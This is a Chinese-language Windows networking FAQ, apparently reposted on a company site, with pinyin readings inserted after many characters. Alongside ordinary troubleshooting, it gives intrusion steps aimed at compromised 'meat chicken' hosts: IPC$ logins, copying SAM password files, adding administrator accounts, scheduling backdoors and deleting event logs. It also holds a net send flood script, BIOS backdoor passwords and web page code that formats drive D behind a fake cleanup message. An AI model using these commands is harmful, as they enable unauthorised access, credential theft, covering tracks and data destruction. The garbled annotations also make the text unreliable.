網絡基礎知識大(dà)全--黃石市子渝網絡科技有限公司

中間會列出所有經過的(de)路由器列表！這(zhè)些路由器如果是暴露再防火牆外面的(de)話(huà)，還(hái)可(kě)以看到路由的(de)IP（這(zhè)裏又涉及到了(le)另外一個(gè)問題：爲什(shén)麽要把路由放在防火牆後面？原因呢(ne)，主要有兩點：1）保護路由器！因爲現在越來(lái)越多(duō)的(de)攻擊和(hé)入侵已經開始瞄準路由器了(le)；2）爲路由器減少負擔！如果所有的(de)過濾功能統統都壓在路由器上面，路由器的(de)負擔就太大(dà)了(le)！）

7）簡單介紹一下(xià)cookie！

作用(yòng)：記錄訪問者的(de)一些信息。例如利用(yòng)cookie記錄你所登陸這(zhè)個(gè)網頁的(de)次數、登陸時(shí)曾經輸入的(de)信息……

大(dà)家在Administrator的(de)cookies目錄中可(kě)以看到很多(duō)的(de)記事本文檔吧？這(zhè)些都是cookie，雖然經過了(le)加密，但是仔細查找的(de)話(huà)，仍然能夠看到一些敏感信息！況且現在也(yě)已經有了(le)專門查看cookie的(de)軟件！

那麽，如何清除cookie呢(ne)？一般情況下(xià)，可(kě)以在Internet選項中的(de)常規選項卡中看到一個(gè)删除cookies的(de)按鈕，點擊就可(kě)以清楚掉了(le)～

除此以外，還(hái)要在internet選項中的(de)内容選項卡中找到自動完成按鈕，把裏面的(de)四項都選中！然後點擊清除表單，清除密碼～

徹底禁止cookie的(de)方法

a:在IE的(de)Internet選項中，找到隐私選項卡！把裏面的(de)滑塊拖到最上面，邊上寫著(zhe)：阻止所有cookie

b:找到Windows目錄下(xià)的(de)cookies目錄！把裏面的(de)txt文件全部删除！，最後應該隻剩下(xià)一個(gè)index.dat文件！之後把這(zhè)個(gè)文件夾設置成隻讀就可(kě)以了(le)～

8）安裝2000的(de)時(shí)候，速度會特别特别特别慢(màn)，怎麽加快(kuài)安裝速度呢(ne)？

在DOS上面安裝，應該用(yòng)98啓動光(guāng)盤來(lái)引導系統！然後按照(zhào)下(xià)面的(de)方法來(lái)做(zuò)，可(kě)以提高(gāo)安裝速度：

g:/>cd windows -------假設G爲光(guāng)驅 windows爲98的(de)安裝目錄！

g:/windows>smartdrv -------加載smartdrv程序！加載後沒有任何提示信息！隻要不返回錯誤信息就是加載成功了(le)～這(zhè)時(shí)候安裝2K的(de)話(huà)，速度會很快(kuài)的(de)哦～

9）Windows2K密碼忘記了(le)，如何才能進入系統？

Windows2K的(de)用(yòng)戶配置信息和(hé)密碼保存在SAM文件裏！該文件位于：c:/winnt/system32/config目錄中！隻要删除這(zhè)個(gè)文件就可(kě)以了(le)～

另外，在c:/winnt/repair目錄中也(yě)同樣有一個(gè)SAM文件（這(zhè)個(gè)是前者的(de)備份！）如果你在登陸肉雞的(de)時(shí)候，copy前面那個(gè)目錄中的(de)SAM文件，你會發現COPY不下(xià)來(lái)！呵呵，爲什(shén)麽？因爲運行著(zhe)的(de)2K系統會保護SAM文件啊～這(zhè)個(gè)時(shí)候你就COPY這(zhè)個(gè)就可(kě)以了(le)！

10)ping不到，tracert不到，但是卻能用(yòng)nbtstat顯示對(duì)方的(de)一些信息，爲什(shén)麽？

因爲tracert和(hé)ping命令使用(yòng)的(de)是ICMP協議(yì)！而nbtstat是通(tōng)過對(duì)方的(de)netbios端口來(lái)獲得(de)對(duì)方的(de)主機信息的(de)！使用(yòng)的(de)是UDP和(hé)TCP協議(yì)！如果對(duì)方僅僅隻對(duì)ICMP協議(yì)做(zuò)了(le)禁止的(de)話(huà)，那通(tōng)過這(zhè)個(gè)命令獲得(de)系統信息是正常的(de)！

11）telnet上去後，如何給對(duì)方開共享？

開共享的(de)命令如下(xià)：net share c=c:/winnt/system 返回共享成功之後直接利用(yòng)//ip/c來(lái)訪問對(duì)方的(de)system目錄了(le)～删除共享用(yòng) share c /del 命令就可(kě)以了(le)

12）如何判斷對(duì)方的(de)具體操作系統版本？

首先用(yòng)ver命令查看對(duì)方的(de)版本号！

如果是5.00.2195的(de)話(huà)，爲2K；5.1.2600爲XP

從這(zhè)裏可(kě)以區(qū)分(fēn)出來(lái)到底是2K還(hái)是XP了(le)～下(xià)面進行更加具體的(de)區(qū)分(fēn)！

2K的(de)pro和(hé)svr版本區(qū)分(fēn)：

在telnet下(xià)，net shart查看啓動的(de)服務～如果對(duì)方開啓了(le)Terminal Services服務的(de)話(huà)，基本上可(kě)以判斷爲svr以上的(de)版本了(le)～如果沒有開啓，則爲pro！

XP的(de)pro和(hé)home版的(de)區(qū)分(fēn)：

home edition是無法安裝iis的(de)！所以，可(kě)以通(tōng)過iis服務來(lái)判斷到底是home版或者是pro了(le)～

當然了(le)，如果對(duì)方是pro，但是将iis删除（停用(yòng)）的(de)話(huà)，就沒辦法判斷了(le)

13）如何查看98的(de)随機啓動的(de)程序？

在98下(xià)有一個(gè)實用(yòng)配置程序（msconfig），中文名爲：系統配置實用(yòng)程序，調用(yòng)的(de)方法是在：開始--運行中輸入msconfig，在裏面，有一個(gè)啓動的(de)選項卡，點擊後，可(kě)以看到很多(duō)随即啓動程序，如果前面帶有鈎的(de)話(huà)，就是啓動時(shí)随機啓動的(de)，取消的(de)話(huà)就是把前面的(de)小鈎去掉就可(kě)以了(le)～除了(le)這(zhè)裏以外，還(hái)有config.sys、autoexec.bat、system.ini、win.ini幾個(gè)選項卡，他(tā)們分(fēn)别對(duì)應這(zhè)幾個(gè)文件！隻不過在這(zhè)裏更方便查看而已！

14）設置了(le)BIOS密碼，可(kě)是卻忘記了(le)，該怎麽辦？

如果是可(kě)以進入Windows的(de)話(huà)，可(kě)以找找biospwds和(hé)cmospwd這(zhè)兩個(gè)軟件看看～

還(hái)有利用(yòng)DEBUG法：

簡單介紹兩種：

1）-o 70 16

-o 71 13

-q

2）-o 70 16

-o 71 16

-q

另一種方法：copy法：

copy con cmos.com

輸入下(xià)面10個(gè)字符：alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格，然後按下(xià)F6并回車，退出，運行這(zhè)個(gè)cmos.com程序就可(kě)以了(le)～

如果不能進入Windows怎麽辦呢(ne)？

1）用(yòng)通(tōng)用(yòng)密碼：

Award Bios密碼：j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589

AMI bios密碼：AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.

2）可(kě)以利用(yòng)CMOS放電

15）如何再命令行下(xià)殺死對(duì)方進程？

利用(yòng)微軟的(de)2K以上操作系統都是含有這(zhè)個(gè)工具的(de)！該工具包含在2K光(guāng)盤的(de)/support/tools文件夾下(xià)！裏面有安裝程序，點擊後，就安裝了(le)2K的(de)support tools工具包，裏面有kill這(zhè)個(gè)工具，這(zhè)時(shí)候再cmd下(xià)可(kě)以輸入kill/?，就可(kě)以看到幫助了(le)，使用(yòng)這(zhè)個(gè)命令的(de)格式是：kill pid （pid是進程的(de)ID号！）再任務管理(lǐ)器中可(kě)以看到進程的(de)ID号

那再命令行下(xià)如何查看進程呢(ne)？呵呵，這(zhè)就用(yòng)到了(le)系統自帶的(de)有一個(gè)後門工具了(le)：再剛才說得(de)那個(gè)目錄中，還(hái)有一個(gè)工具叫tlist ！直接輸入tlist就可(kě)以得(de)到pid遇隊形程序的(de)列表了(le)～

16）如何查看本機的(de)DNS服務器？

ipconfig其實是可(kě)以的(de)，還(hái)可(kě)以利用(yòng)一個(gè)命令：再cmd下(xià)輸入netsh，進入到netsh>提示符，再輸入：int ip 進入到interface ip> 然後再次輸入dump，這(zhè)時(shí)候屏幕上出現當前連接的(de)配置情況了(le)

1）查看本機IP：首先鍵入netsh，再netsh>提示符下(xià)輸入：interface 回車之後：ip 回車再之後：show address 回車這(zhè)樣，就可(kě)以看到當前連接的(de)IP地址和(hé)子網掩碼。

2）修改網絡配置：接著(zhe)上面的(de)命令，我們使用(yòng)：set address name=“本地連接” source=static addr=192.168.0.200 mask=255.255.255.0，這(zhè)樣就修改了(le)當前的(de)IP地址，用(yòng)show address來(lái)看

3）顯示一個(gè)完整的(de)網絡配置教本：

剛才說過，第一個(gè)命令顯示的(de)信息不如ipconfig/all全面，不用(yòng)著(zhe)急，netsh再打印顯示網絡配置上，還(hái)是有自己的(de)特色的(de)！例如：再interface ip>狀态下(xià)輸入：dump，會顯示一個(gè)清單，顯示所有本地連接（不管你是否使用(yòng)～）與netstat -an不完全一樣！

17）肉雞上的(de)部分(fēn)文件無法删除，怎麽辦？

如果對(duì)方的(de)文件夾是隻讀的(de)話(huà)，會出現拒絕訪問的(de)字樣！這(zhè)時(shí)候，我們可(kě)以再del命令後面加上/f參數來(lái)删除！

18）再說一個(gè)可(kě)以限制用(yòng)戶登陸時(shí)間的(de)命令！

再net命令中就可(kě)以實現這(zhè)樣的(de)功能！具體方法如下(xià)：

假如我們打算(suàn)讓：coldcrysky這(zhè)個(gè)用(yòng)戶再周日到周易的(de)上午八點到下(xià)午四點之間可(kě)以登陸，用(yòng)這(zhè)個(gè)命令：

net user coldcrysky /timesunday-monday,08:00-16:00

之後利用(yòng)net user coldcrysky命令來(lái)查看登陸時(shí)間的(de)限制，可(kě)以看到是我們所規定的(de)時(shí)間

在此，特别提醒各位：命令中：星期日才是一周的(de)開始！！！不要當成星期一！

如果想恢複回去：net user coldcrysky /time:all --這(zhè)樣就可(kě)以了(le)～

19)如何删除windows2K的(de)默認共享？

首先打開記事本，輸入如下(xià)内容：

net share c$ /delete

net share d$ /delete

net share e$ /delete

net share f$ /delete

net share g$ /delete

net share ipc$ /delete

net share admin$ /delete

之後點擊保存成批處理(lǐ)文件（後綴爲：bat的(de)文件！）！加入到啓動組中就可(kě)以了(le)～

20）139端口的(de)又一用(yòng)法

1：Net use //XXX.XXX.XXX.XXX/ipc$ "password" /user:"username" 建立一個(gè)IPC連接

2：net use H: //XXX.XXX.XXX.XXX/C$ 将對(duì)方的(de)C盤映射爲自己的(de)h盤

3：copy c on h:/reboot.bat

Iisreset /reboot

CTRL+Z

在對(duì)方的(de)C盤上生成一個(gè)能重啓機器的(de)文件

4：net time //XXX.XXX.XXX.XXX 得(de)到對(duì)方機器時(shí)間

5：at //XXX.XXX.XXX.XXX 重啓的(de)時(shí)間 c:/reboot.bat 設定對(duì)方重啓的(de)時(shí)間！

6：at //XXX.XXX.XXX.XXX 查看任務上面是否添加了(le)這(zhè)個(gè)任務

7：等對(duì)方重啓好了(le)～

21）利用(yòng)批處理(lǐ)文件來(lái)建立一個(gè)記錄3389登陸者信息的(de)記錄器

由于Terminal Service默認是沒有日志記錄的(de)，隻能依靠他(tā)的(de)系統日志，但是系統日志隻能記錄一些大(dà)動作（開啓或停止服務），那麽，如何用(yòng)批處理(lǐ)文件來(lái)編寫一個(gè)将是3389端口的(de)程序呢(ne)？很簡單：

建立一個(gè)批處理(lǐ)文件：内容如下(xià)：

@echo off

date/t >> c:/3389log.txt

:TS3389

time/t >> c:/3389log.txt

netstat -an | find "3389" |find "ESTABLISHED" >>c:/3389log.txt

goto :TS3389

之後保存！

22）網絡命令小節

A、NET命令：

IPC連接：格式 net use //對(duì)方IP/ipc$ "密碼" user:"用(yòng)戶名" 『建立IPC連接～』

net use //對(duì)方IP/ipc$ /delete 『斷開連接～』

以下(xià)操作需要在連接到對(duì)方主機後才可(kě)進行！！！

net user coldcrysky xyz /add 『在連接的(de)目标主機中加入一個(gè)用(yòng)戶名爲COLDCRYSKY 密碼爲WYZ的(de)用(yòng)戶』

net localgroup Administrator coldcrysky /add 『把名爲coldcrysky的(de)用(yòng)戶加入ADMIN組-以爲著(zhe)權限的(de)提高(gāo)』

net use z://對(duì)方IP/C$ 『把對(duì)方的(de)C盤映射爲本機的(de)Z盤-可(kě)依照(zhào)需要更改映射盤符！』

net start telnet 『開啓TELNET』

net user guest /active:yes 『激活GUEST』

net user guest coldcrysky 『把GUEST密碼改爲COLDCRYSKY』

B、AT命令：

查看遠(yuǎn)程機時(shí)間：net time //對(duì)方IP

加入一項新任務：

at //對(duì)方IP 時(shí)間文件名『用(yòng)來(lái)把自己上傳的(de)後門程序在制定時(shí)間運行，方便以後進入肉雞！』

C、TELNET命令：

telnet 對(duì)方IP 端口『作用(yòng)不用(yòng)我說了(le)吧？？？』

D、FTP命令：

登陸：ftp 對(duì)方網址（IP地址）

上傳文件：get 文件在本機完整路徑對(duì)方文件存放完整路徑

下(xià)載文件：put 對(duì)方文件完整路徑本機存放文件路徑

E、COPY命令：

在建立連接後（尤其是IPC$連接後，很有用(yòng)的(de)命令哦～）

⑴copy index.htm //127.0.0.1/c$/index.htm

『将本機index.htm文件複制到127.0.0.1的(de)C盤下(xià)，如果要放到對(duì)方的(de)NT目錄下(xià)，則把C改爲admin$』

⑵copy //127.0.0.1/admin/repair/sam_ c: 『将遠(yuǎn)程機數據庫文件拷貝到本機C盤根目錄下(xià)』F、SET命令：

主要用(yòng)于分(fēn)析目标計算(suàn)機的(de)基本信息用(yòng)！具體使用(yòng)方法請查找相關文件！

G、NBTSTAT命令：

nbtstat -A 對(duì)方IP （這(zhè)個(gè)A大(dà)寫）

『在其中顯示<037>前面的(de)英文或數字就是計算(suàn)機名稱！當然，也(yě)可(kě)以利用(yòng)PING -A 對(duì)方ip的(de)方法來(lái)查看對(duì)方主機名！效果相同！！！』

H、SHUTDOWN命令：

『用(yòng)來(lái)關閉對(duì)方NT服務的(de)命令』格式如下(xià)：

shutdown //IP地址 t:20

『20秒後自動關閉對(duì)方NT服務！由于對(duì)對(duì)方機器影(yǐng)響較大(dà)，慎用(yòng)！！！』

I、DIR命令：

還(hái)用(yòng)我說麽？大(dà)家是不是早就該掌握了(le)？？？（不知道的(de)還(hái)是查閱相關資料吧～～～）

J、ECHO命令：

echo coldcrysky >index.htm 『用(yòng)coldcrysky覆蓋掉原INDEX.HTM中所有内容』

echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』

K、ATTRIB命令：

更改文件屬性用(yòng)，格式：

Attrib -r index.htm 『去掉隻讀屬性』（＋- 分(fēn)别代表增加和(hé)減少）

L、DEL命令：

『删除日志的(de)時(shí)候用(yòng)！』

del c:/winnt/system32/logfiles/*.*

del c:/winnt/system32/config/*.evt

del c:/winnt/system32/dtclog/*.*

del c:/winnt/system32/*.log

del c:/winnt/system32/*.txt

del c:/winnt/*.txt

del c:/winnt/*.log

M、PING命令：

-t ：ping制定IP，知道網絡斷開或按CTRL+C結束！

-a ：解釋PING IP的(de)主機名

-n count ：發送count指定的(de)ECHO數據包，默認爲4個(gè)！

23）開啓服務和(hé)停止服務的(de)net start and net stop

net start和(hé)net stop到底能開啓什(shén)麽服務？其實這(zhè)點也(yě)不需要你強記，記住這(zhè)個(gè)命令就可(kě)以了(le)：net help start和(hé)net help stop，這(zhè)兩個(gè)會顯示出你所能開啓的(de)服務有那些~~

24）關于雙系統的(de)兩個(gè)問題：

A、如何在雙系統（98、2000）中安全删除2K？

先制作一張Windows 98 的(de)啓動軟盤，再用(yòng)它啓動你的(de)計算(suàn)機，運行sys命令恢複Windows 98引導記錄後，再運行fdisk/mbr恢複主引導記錄，完成後進入Windows 98，把winnt 和(hé)system volumn information 目錄删除，再删掉C盤上的(de)boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了(le)。

B、 Windows 98/XP雙系統啓動菜單修複

1.修複前，在BIOS中設置從光(guāng)驅啓動。用(yòng)Windows XP安裝盤啓動電腦(nǎo)，在加載必要的(de)驅動後，出現Windows XP的(de)安裝界面。有三個(gè)選項：

（1）要現在開始安裝Windows XP，請按“Enter”鍵。

（2）要用(yòng)“恢複控制台”修複Windows XP安裝，按“R”鍵。

（3）要退出安裝程序，不安裝Windows XP，按“F3”鍵；

2. 按“R”鍵，進入“Microsoft Windows XP (TM) 故障恢複控制台”界面；故障恢複控制台提供系統修複和(hé)故障恢複功能。系統這(zhè)時(shí)會搜尋已安裝的(de)Windows XP系統文件，然後顯示搜尋結果，并詢問“要登錄到哪個(gè)Windows XP安裝（要取消，請按Enter）”，選擇1. D:/Windows，回車，系統會再詢問“管理(lǐ)員(yuán)密碼”，再鍵入安裝Windows XP時(shí)設置的(de)管理(lǐ)員(yuán)密碼，回車，出現D:/Windows〉，這(zhè)時(shí)需要輸入修複命令Fixboot，後面的(de)參數爲啓動扇區(qū)要寫入的(de)磁盤盤符，這(zhè)裏填入C:，回車。修複完成，鍵入Exit退出。重啓後就會看到久違的(de)雙重啓動菜單了(le)。并且，這(zhè)樣修複後基本不産生垃圾文件。

25）這(zhè)裏說幾個(gè)主頁惡意代碼

A、死循環代碼：

『把下(xià)列代碼加入到網頁中，可(kě)達到如上效果』

說明(míng)：當含有這(zhè)段代碼的(de)網頁被人(rén)點擊，連接就會不斷的(de)打開IE浏覽器，直到你的(de)系統資源浪費到0％～隻有重新啓動才能正常使用(yòng)！

預防方法：禁用(yòng)所有的(de)ActiveX控件和(hé)插件！因爲這(zhè)是一個(gè)ActiveX教本程序～

B、恐怖的(de)大(dà)圖片：

『把下(xià)列代碼加入到網頁中，可(kě)達到如上效果』

說明(míng)：當打開這(zhè)樣的(de)網頁，IE會不斷的(de)解釋試圖打開，但由于圖片實在太大(dà)，超出了(le)其處理(lǐ)能力，所以

C、地震死機代碼：

『把下(xià)列代碼加入到網頁中，可(kě)達到如上效果』

說明(míng)：是windows9x的(de)設備名稱解析漏洞！

WINDOWS9x的(de)/con/con設備名稱解析漏洞允許用(yòng)戶進行攻擊，倒是98死機。原理(lǐ)：我們知道，CON是DOS下(xià)的(de)特殊設備名，不允許做(zuò)文件名，如果我們在DOS下(xià)鍵入如下(xià)命令：copy coldcrysky.txt con，系統會顯示coldcrysky.txt的(de)内容，如果換成：copy coldcrysky.txt>con系統會提示文件不能拷貝到文件自身。如果吧con換成LPT或PRN，則輸出coldcrysky.txt到打印機。由此可(kě)見，CON代表文件本身，如果使用(yòng)/CON/CON命令，則意味著(zhe)系統不斷調用(yòng)文件本身，視系統資源迅速枯竭，連按CTRL+ALT+DEL的(de)機會都沒有～

解決辦法：

對(duì)于9X系統，強烈建議(yì)打補丁！！！2000和(hé)XP則不會死機～

D、格式化(huà)硬盤：（最恐怖的(de)～～～慎用(yòng)！！！請勿用(yòng)于非法用(yòng)途！！！使用(yòng)後如果有任何負作用(yòng)，後果自負！與傷寒天空『ColdCrySky』；亂刀(dāo)留影(yǐng)無關！！！）

scr,Reset();

scr.Path="C://WINDOWS//StartMenu//Programs//啓動//startup.htm";

scr.Doc="

WSH.rUN(`start/m format.com d:/q/autotest/u`);

alert(`IMPORTANT : Windows is removing unused temporary files.`);

scr.write();

說明(míng)：當您浏覽了(le)網頁，會把startup.hta文件寫入啓動文件夾，并提示WINDOWS正在删除臨時(shí)文件！實際上是在格式化(huà)你的(de)D盤，代碼中的(de)：F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對(duì)應爲：Windows Scripting Host Shell Object。代碼中的(de)：WSH全稱是：Windows Scripting Host，是微軟的(de)一種基于32位系統平台與語言無關的(de)教本解釋機制，它使得(de)腳本能在WINDOWS桌面或命令提示符下(xià)運行～WSH所對(duì)應的(de)程序WScript.exe是一個(gè)腳本語言解釋器，位于WINDOWS所在文件夾下(xià)，所以它可(kě)以像執行批處理(lǐ)文件一樣執行WSH腳本程序～

解決方法：1）更新您的(de)浏覽器，使用(yòng)最新的(de)浏覽器上網！

2）修改msdos.sys，在其中加入：Bootmentu=0命令行，目的(de)是禁用(yòng)啓動菜單。

3）吧format.com改名

4）禁用(yòng)WSH。具體方法：在win98中，從添加删除程序中點擊WINDOWS安裝程序，打開附件一項，将WINDOWS SCRIPTING HOST前面的(de)選項去掉，就可(kě)以卸載掉WSH了(le)～～～win2000和(hé)xp的(de)用(yòng)戶可(kě)以在我的(de)電腦(nǎo)-工具菜單-文件夾選項-選擇文件類型，找到VBS VBSCRIPT FILE選項，點擊删除！

26）系統自帶的(de)系統工具

1、msinfo32.exe

位于C:/Program Files/Common Files

Microsoft Shared/Msinfo/msinfo32.exe，顯示計算(suàn)機中的(de)有關系統信息，可(kě)用(yòng)其診斷、解決計算(suàn)機問題并查看遠(yuǎn)程系統所生成的(de)系統報告。

2、drwatson.exe --

位于C: /Windows /drwatson.exe，當某個(gè)應用(yòng)程序在運行過程中出錯時(shí)，它就會将出錯的(de)程序以及出錯的(de)内存地址一一記錄下(xià)來(lái)，并保存爲Windows的(de)Drwatson子目錄下(xià)的(de)*.wlg記錄文件。

3、sfc.exe

位于C:/Windows/System/sfc.exe，用(yòng)于自動搜索被改變、删除或損壞了(le)的(de)系統文件。

4、msconfig.exe

位于C:/Windows/System/msconfig.exe，通(tōng)過修改啓動方式以及啓動時(shí)運行哪些應用(yòng)程序等系統配置，從而達到快(kuài)速排除故障的(de)目的(de)。

5、scanreg.exe

位于C:/windows/command/scanreg.exe（DOS版本）及C:/windows/scanregw.exe（Windows版本），用(yòng)于檢查、修複、備份以及還(hái)原系統注冊表及相關配置文件的(de)工具軟件，防止因注冊表數據被破壞而導緻的(de)系統故障。

6、vcmui.exe

位于C:/Windows/vcmui.exe，在後台自動将被覆蓋的(de)驅動程序備份下(xià)來(lái)，當我們安裝的(de)新驅動出錯時(shí)可(kě)用(yòng)它進行恢複。

7、winrep.exe

位于C:/Windows/winrep.exe，能自動收集有關系統信息并提示用(yòng)戶輸入故障所在，幫我們編寫一篇完整的(de)“求援”報告，并将其發送給有關技術維護人(rén)員(yuán)，簡化(huà)“求援”操作。

這(zhè)七個(gè)Windows自帶的(de)小程序可(kě)以在開始菜單--運行中直接輸入文件名（無需輸入擴展名）調出該程序！

27）批處理(lǐ)在入侵中的(de)幾則妙用(yòng)！

A、簡化(huà)IPC$登陸肉雞的(de)操作：

用(yòng)記事本建立一個(gè)名字爲：ipcruqin.bat的(de)批處理(lǐ)文件，内容如下(xià)：

@net use //%1/ipc$ %3 /u:"%2"

@echo OK！已經成功建立連接

之後，大(dà)家在CMD下(xià)輸入：ipcruqin.bat 肉雞IP 肉雞的(de)admin帳号/用(yòng)戶的(de)密碼。就可(kě)以登陸上去了(le)，而不需要那一大(dà)長(cháng)串的(de)命令了(le)！

B、批處理(lǐ)轟炸對(duì)方電腦(nǎo)：

打開一記事本，在裏面輸入如下(xià)内容：

@echo 正在轟炸中……

tart

@net send %1 %2

@if errorlevel 1 goto over

goto start

ver

@echo 發送失敗

将其保存爲bat格式的(de)文件即可(kě)，使用(yòng)方法：*.bat（該批處理(lǐ)文件的(de)名字）+ 空格 + 目标IP + 空格 + 你要對(duì)他(tā)說得(de)話(huà)！

這(zhè)次先簡單介紹這(zhè)三個(gè)！等下(xià)次有機會再給大(dà)家介紹更多(duō)的(de)批處理(lǐ)文件的(de)用(yòng)途！

28）再說幾個(gè)非常簡單實用(yòng)的(de)DOS命令（工具）：

A、fport.exe --查看那些端口都是那些程序使用(yòng)的(de)命令。

B、netstat -an --查看那些端口于外部的(de)IP連接。比如這(zhè)裏顯示：23 XX.XX.XX.XX 而你又沒有開23端口，那麽，呵呵……還(hái)用(yòng)我說麽？

C、letmain.exe //ip -admin -d --列出本機的(de)administrators組的(de)用(yòng)戶名查看是否有異常。

D、pslist.exe --列出進程

E、pskill.exe --殺掉進程，有時(shí)候再任務管理(lǐ)器中無法終止程序，那就用(yòng)這(zhè)個(gè)工具來(lái)停止進程。

F、login.exe --列出當前有那些用(yòng)戶登陸再你的(de)機器上。

局域網應用(yòng)問題專題解答(dá)

問：在由三台電腦(nǎo)組成的(de)局域網中，我在其中一台電腦(nǎo)上用(yòng)過Windows優化(huà)大(dà)師後，爲什(shén)麽這(zhè)台電腦(nǎo)就不能登錄網絡，并且還(hái)提示找不到撥号适配器？

答(dá)：根據你說的(de)情況，是沒有安裝“撥号網絡”。解決方法是：在“控制面闆”的(de)“添加/删除程序”中，選擇“Windows安裝程序”，在“組件”的(de)“通(tōng)訊”中選擇“撥号網絡”，然後将Windows安裝盤放入光(guāng)驅進行安裝，重新啓動計算(suàn)機後就可(kě)使用(yòng)撥号網絡了(le)。

我新購(gòu)的(de)網卡在電腦(nǎo)上無法安裝，而在其他(tā)電腦(nǎo)上卻使用(yòng)正常，這(zhè)是怎麽回事？

答(dá)：如果在電腦(nǎo)中安裝好網卡後，系統沒有提示找到新硬件，你可(kě)運行“添加新硬件向導”來(lái)讓系統搜索新硬件。方法是單擊“開始”，指向“設置”，單擊“控制面闆”，然後再雙擊“添加新硬件”。按照(zhào)屏幕提示操作。你可(kě)選“讓Windows搜索新硬件嗎？”，單擊“是（推薦）”，然後再單擊“下(xià)一步”，讓系統找到網卡再安裝其驅動。

而如果出現以下(xià)任何現象，網卡或者網卡所在的(de)插槽損壞：

1、“添加新硬件向導”檢測不到網卡；

2、“添加新硬件向導”能夠檢測到網卡，但無法正常工作。

爲了(le)确定到底是網卡還(hái)是插槽的(de)問題，可(kě)以檢查網卡是否牢靠插入插槽之中。如果網卡已牢靠插入插槽之中，請改插到其他(tā)插槽之中試試。如果問題仍未解決，則可(kě)能是網卡損壞或與你的(de)電腦(nǎo)不兼容，可(kě)更換之。

我的(de)電腦(nǎo)出現“網上鄰居”中找不到其他(tā)聯網電腦(nǎo)的(de)故障，如何解決？

答(dá)：“網上鄰居”是按工作組顯示計算(suàn)機的(de)。如果你的(de)電腦(nǎo)沒有設置工作組名稱，打開“網上鄰居”時(shí)就可(kě)能看不到其他(tā)電腦(nǎo)。單擊“開始”，指向“設置”，單擊“控制面闆”，雙擊“網絡”，然後再單擊“标識”選項卡。你局域網中所有電腦(nǎo)“工作組”框中的(de)名稱應爲一樣，如有不同你可(kě)在此框中鍵入相同的(de)工作組名稱，然後單擊“确定”重啓電腦(nǎo)既可(kě)。

此外，如果“網上鄰居”中不出現“整個(gè)網絡”圖标，可(kě)能是在Windows中沒有安裝必要的(de)網絡組件。要與網絡上的(de)其他(tā)計算(suàn)機連接，則必須安裝以下(xià)組件：Microsoft網絡客戶、網絡适配器、至少一種網絡協議(yì)（如IPX/SPX、TCP/IP等）。可(kě)打開“網絡”，檢查“配置”選項卡上的(de)列表，确保已安裝了(le)各種必要的(de)網絡組件。如有，你可(kě)重新安裝各種缺少的(de)組件即可(kě)。

問：辦公室機器桌面的(de)“網上鄰居”圖标沒了(le)，能上Internet，但無法浏覽其他(tā)機器上的(de)資源了(le)，怎麽辦？

答(dá)：說明(míng)你的(de)Internet屬性完好，但網上鄰居屬性中的(de)“Microsoft 網絡用(yòng)戶”這(zhè)一客戶組件沒了(le)。

進到“控制面闆”中雙擊“網絡”，先在彈出的(de)網絡對(duì)話(huà)框中點按“添加”按鈕，再從随後彈出的(de)“請選擇網絡組件類型”對(duì)話(huà)框中雙擊“客戶”，最後從随後的(de)“選擇網絡客戶機”對(duì)話(huà)框的(de)左側選擇“Microsoft”後再選擇“Microsoft 網絡用(yòng)戶”，“确定”再“确定”并據提示重啓計算(suàn)機就ok啦！

問：右鍵中的(de)“共享”命令已經顯身！但我設了(le)共享不想讓别人(rén)從網上鄰居中看到這(zhè)個(gè)共享目錄，隻有自己知道且能實現異地機上有完全操作的(de)權限。

答(dá)：找到你想要共享的(de)文件夾并右鍵點選“共享…”----這(zhè)裏我就以共享“D:/Windows 98”爲例，先選中“共享爲”後在共享名“Windows 98(當然也(yě)可(kě)改名共享哦)”後加一英文狀态的(de)“$”符，再選中“完全”并輸入設定好“密碼”，然後“确定”一次密碼就OK了(le)。

這(zhè)樣一來(lái)，絕對(duì)保證别人(rén)從網上鄰居中看不到這(zhè)個(gè)共享目錄的(de)！那~~自己想從異地機上進入并實現完全操作時(shí)怎麽辦呢(ne)？呵呵，這(zhè)麽辦：從異地機的(de)地址欄中鍵入“//(機器名)/$(你的(de)共享目錄名)”并“ENTER”，再輸入密碼并确定後，就進入啦！這(zhè)樣你可(kě)靜悄悄地實現異地機上在自己設定的(de)共享目錄内進行完全操作啦！不過注意其中“/”不能誤輸入成“/”

問：如何使用(yòng)交換機的(de)UpLink端口，怎樣連接？使用(yòng)了(le)UpLink口後，是否還(hái)可(kě)以使用(yòng)其相鄰最近的(de)端口？

答(dá)：UpLink口是交換機上常見的(de)一種端口，它是爲了(le)便于兩台交換機之間進行級聯的(de)端口。它與其相鄰的(de)普通(tōng)UTP口使用(yòng)的(de)是同一通(tōng)道，因而，如果使用(yòng)了(le)UpLink口，另一個(gè)與之相鄰的(de)普通(tōng)端口就不能再使用(yòng)了(le)。這(zhè)兩個(gè)端口稱爲共享端口，不能同時(shí)使用(yòng)。級聯的(de)時(shí)候，你可(kě)使用(yòng)一般的(de)網線（網線的(de)兩端都遵循同一标準，即同是EIA/TIA 568A或568B）将一個(gè)交換機的(de)普通(tōng)端口和(hé)另一個(gè)交換機的(de)UpLink口連起來(lái)。如兩個(gè)設備都使用(yòng)UpLink口連接，網線需要一端使用(yòng)EIA/TIA 568A的(de)标準，另一端使用(yòng)EIA/TIA 568B的(de)标準（如下(xià)表）。

标準568a 标準568b

橙白1 綠白1

橙2 綠2

綠白 3 橙白3

藍4 藍4

藍白5 藍白5

綠6 橙6

棕白7 棕白7

棕8 棕8

問：我在安裝網卡後，在“系統→設備管理(lǐ)器”中網卡出現黃(huáng)色的(de)“！”号，請問該如何解決？

答(dá)：網卡較容易與其他(tā)設備發生資源沖突，尤其是在系統中安裝有多(duō)個(gè)插卡的(de)情況下(xià)，解決辦法是：

1、更換網卡在主闆插槽上的(de)位置是最好的(de)解決辦法。